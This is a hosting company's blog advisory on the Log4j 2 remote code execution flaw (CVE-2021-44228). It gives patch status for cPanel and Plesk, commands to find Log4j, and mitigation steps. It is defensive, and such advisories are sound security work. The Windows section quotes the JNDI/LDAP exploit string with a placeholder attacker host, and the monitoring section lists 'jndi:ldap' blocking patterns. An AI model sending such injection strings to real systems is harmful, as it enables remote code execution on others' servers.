View all posts

Apache Log4j 2 vulnerability (CVE-2021-44228)

QuickHostUK Managed Server customers have already had their servers patched. If you are running a custom application on the server that uses Log4J, please contact us as soon as possible.

Multiple versions of the Apache Log4j 2 library are affected by an unauthenticated remote code execution vulnerability (CVE-2021-44228).

The Apache Foundation developed Log4j 2 as an open-source Java logging library. Many applications use it and it is a dependency for numerous services. A wide range of enterprise and custom applications are included.

In enterprise Java software, Log4j 2 is frequently used. It is part of Apache frameworks including the following:

  • Apache Struts2
  • Apache Druid
  • Apache Swift
  • Apache Flink
  • Apache Solr

An application is vulnerable if untrusted user input is passed to a vulnerable version of the Log4j logging library.

Multiple vulnerabilities affect version 1 of the Log4j library, which is no longer supported. Developers are urged to upgrade to the latest version of Log4j 2.

We recommend the following priority actions

Install the latest updates as soon as possible wherever Log4j is used

All organizations using software that includes Log4j should prioritize this task.

Here is a list of products vulnerable to the Log4j 2 library, which is frequently used in software:

https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages
https://github.com/NCSC-NL/log4shell/tree/main/software

If your specific product isn’t listed, you can use the instructions below to determine if Log4j is installed. Follow the vendor’s guidance on updating your software or applying mitigations if your product is listed. A new product may also appear on the list, so keep refreshing the page. You may request that your product be added to the list if it is not listed but is vulnerable.

In cases where vendors have not provided updates to products, Log4j 2 (2.10 and later) can be mitigated by setting log4j2.formatMsgNoLookups to true or removing the JndiLookup class from the classpath.

Discover instances of Log4j

cPanel Servers

The only service that uses Log4j on a stock cPanel server is cpanel-dovecot-solr. cPanel dovecot solr is a useful feature that helps to index and search documents and email attachments on IMAP mailboxes. cPanel dovecot solr only listens on localhost. Hence, it is not publicly accessible. The only way to interact with it is via IMAP search, and IMAP requires authentication, so It’s safe to leave it in place, however, you can uninstall it from WHM if you wish.

Check if your server has been patched:

rpm -q --changelog cpanel-dovecot-solr | grep -B1 CVE-2021-44228
* Fri Dec 10 2021 Tim Mullin <tim@cpanel.net> -  8.8.2-4.cp1180
- CPANEL-39455: Add mitigation for CVE-2021-44228

As we can see, this was already patched on Friday 10th December 2021.

Plesk Servers

Plesk does not use Java internally, therefore this vulnerability does not affect Plesk. Since Tomcat support was removed from Plesk 17.8, Plesk no longer supports users’ Java-based applications.

Windows Servers

Microsoft claims the majority of attacks in recent days have been a result of mass scanning conducted by attackers in order to identify vulnerable systems, as well as scanning conducted by security researchers. These strings might appear in a web request log as part of an attack pattern: $ { jndi:ldap :// [attacker site] /a}

To evade detection based on patterns, attackers obfuscate these requests. There have been examples of things like running an upper or lower command within an exploitation string.

Microsoft recommends using Microsoft 365 Defender to help protect against and detect attacks

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Microsoft Defender Antivirus detects components and behaviours related to this threat.

Other or custom setups

You should also determine whether Log4j is installed elsewhere. A Java application can include all of its dependent libraries within its installation. You can search the file system for log4j.

The search should include searching inside EAR, JAR, and WAR files. For instance:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

It is also possible to search within a dependency or package manager. For instance:

dpkg -l | grep log4j

Additionally, you can check if your system is already patched

rpm -qa --changelog | grep -A1 -B2 CVE-2021-44228
* Fri Dec 10 2021 Tim Mullin <tim@cpanel.net> - 8.8.2-4.cp1180
- CPANEL-39455: Add mitigation for CVE-2021-44228

There may be multiple copies of Log4j present, each of which will need to be updated or mitigated.

Monitoring and blocking of networks as a protective measure

  • The use of Web Application Firewalls (WAFs) can provide protection against this vulnerability. You might want to block URLs containing strings such as jndi:ldap. Variations of the exploit string may circumvent current WAF rules. As a result, WAFs cannot serve as the only means of security.
  • Log files for services using affected Log4j versions could contain user-controlled strings. For instance, jndi:ldap.
  • Using monitoring software like Netflow, you can look for internally initiated LDAP connections to external destinations that were not seen before 10 December 2021. This might indicate that a vulnerability has been exploited. Use the above methods to search for Log4j on the initiating host.

Related Articles...

cpanel wordpress

WordPress Manager is now in your Client Area

We’re glad to announce that we’ve integrated WordPress management into your Client Area. You can now manage all of your WordPress sites without logging into a single WordPress admin panel, or hosting account for that matter! Simply... Read more
No file-validation for Wildcard SSL

No more file validation for Wildcard SSL

Urgent DCV Changes for Wildcard certificates There will be no more file validation for Wildcard SSL from 15th November 2021. CA/B Forum changes DCV is a process by which a CA learns that a domain is managed by the applicant for a certificate.... Read more

This website uses cookies

We use cookies for the analysis of our visitor data, to improve our website, and to give you a great website experience. For more information about the cookies we use, please see our cookie policy.